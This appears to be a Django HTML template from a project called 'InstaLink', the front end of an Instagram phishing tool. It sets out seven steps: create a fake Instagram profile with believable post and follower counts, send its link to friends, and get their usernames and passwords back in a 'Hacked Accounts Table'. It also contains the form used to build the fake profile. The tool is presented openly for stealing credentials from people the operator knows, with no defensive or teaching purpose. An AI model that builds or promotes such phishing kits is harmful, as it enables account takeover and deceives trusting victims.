<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Home Page</title>
    {% load static %}

    <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.0-1/css/all.css">
    <link type="text/css" rel="stylesheet" href="{% static 'styleindex1.css' %}">
    <link type="text/css" rel="stylesheet" href="{% static 'createStyle.css' %}">
    <script src="{% static 'typed.js' %}" type="text/javascript"></script>
    <script src="{% static 'jquery.js' %}" type="text/javascript"></script>
    <script src="{% static 'animate2.js' %}" type="text/javascript"></script>
    </head>
<body>
    <div class="header">
        <h2 class="title">Insta<i class="fa fa-theater-masks"></i>Link</h2>
        <div class="typedDiv"><p class="typed"></p></div>
    
    </div>

{% if messages %}
    <div class="notify">
        <div class="area">
            {% for msg in messages %}
            <p class="msg">{{msg}}</p>
            {% endfor %}
            <button class="ok">OK</button>
        </div>
    </div>
{% endif %}
    <!-- content block goes here -->
    <div class="info">
        <ul>
            <li><p><b>Step 1 : </b>Create a Fake account by Pressing Create button. Use any name in Name Field.</p></li>
            <li><p><b>Step 2 : </b>Use Non-Doubtable Number of Posts, Followers and Followings.</p></li>
            <li><p><b>Step 3 : </b>Select Any Photo From Your Gallery To set the Profile Picture.</p></li>
            <li><p><b>Step 4 : </b>Click On Create Button.</p></li>
            <li><p><b>Step 5 : </b>After Successful creation of Fake Account Go To Home Page and Copy the Link from Fake Account Table and share with Your Friends.</p></li>
            <li><p><b>Step 6 : </b>Tell Them To follow the Page.</p></li>
            <li><p><b>Step 7 : </b>If they Follow the Fake Account Page, You will Get their Username and Password in Your Hacked Accounts Table.</p></li>
        </ul>
    </div>
    <div class="downAnimation">
        <label for="base" class="labDown">
            <i class="fa fa-angle-double-down"></i>
        </label>
    </div>
    <div class="createBase">
        <h1 class="createHead">Create Fake Account Here</h1>
        <form method="post" action="createAccount" enctype="multipart/form-data">
            {% csrf_token %}
            <div class="fakename">
                <div class="fakeinner">
                    <button class="profileAdd" type="button"><i class="fa fa-plus"></i></button>
                    <img class="profile" src="{% static 'defaultuser.png' %}" alt="Profile Pic">
                </div>   
                    <input type="text" class="uname" name="faname" placeholder="Fake Instagram ID" required>
            </div>
            <div class="inputs" id="base">
                <input type="file" name="faimage" id="Prof" accept="image/*" required>
                <input type="number" name="faposts" class="small posts" required>
                <input type="number" name="fafollowers" class="small followers" required>
                <input type="number" name="fafollowing" class="small following" required>
            </div>
            <div class="inputs">
                <label for="">Posts</label>
                <label for="">Followers</label>
                <label for="">Following</label>
            </div>

            <div class="Create">
                <button type="submit">Create</button>
            </div>
        </form>
    </div>
    <!--end of content block-->
    <footer>
        <div class="fhead">Thank You</div>
    <div class="fmain">
        <div class="about">
            <p>Designed and developed By <span class="name">Prasad Poojary</span>
            </p>
        </div>
         <div class="contact">
            <ul>
                <li><a href="https://www.instagram.com/_w.e.b__w.a.r.r.i.o.r_/"><i class="fab fa-instagram"></i>Instagram</a></li>
                <li><a href="mailto: prasadpoojary815@gmail.com"><i class="fab fa-google"></i>E-mail</a></li>
                <li><a href="https://github.com/Prasad815"><i class="fab fa-github"></i>github</a></li>
                <li><a href="https://www.linkedin.com/in/prasad-poojary-247665193/"><i class="fab fa-linkedin"></i>Linkedin</a></li>
            </ul>
        </div>
    </div>
    <div class="copyright">
        <i class="fa fa-copyright"></i> Copyright 2020-2023. All Rights Reserved.
    </div>
        
    </footer>
    <nav>
        <ul class="navv">
            <li>
                <a href="homepage"><i class="fa fa-home"></i>
                <span>Home</span></a>
            </li>
            <li class="home">
                <a href="create"><i class="fa fa-plus"></i>
                <span>Create</span></a>
            </li>
            <li>
                <a href="profile"><i class="fa fa-user"></i>
                <span>Profile</span></a>
            <li>
                <a href="feadback"><i class="fa fa-comments"></i>
                <span>Feedback</span></a>
            <li>
                <a href="logout"><i class="fa fa-sign-out-alt"></i>
                <span>Logout</span></a>
            </li>
        </ul>
    </nav>
</body>
</html>